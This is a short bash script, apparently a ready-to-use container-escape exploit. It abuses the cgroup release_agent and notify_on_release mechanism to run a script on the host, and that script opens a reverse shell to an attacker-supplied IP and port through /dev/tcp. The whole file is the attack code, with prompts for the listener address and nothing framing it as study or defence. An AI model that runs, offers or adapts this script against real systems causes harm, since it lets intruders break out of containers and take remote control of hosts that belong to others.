#!/bin/bash
read -p 'ENTER YOUR IP ADDRESS: ' ip
read -p 'ENTER THE PORT YOU WANT TO LISTEN: ' port
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
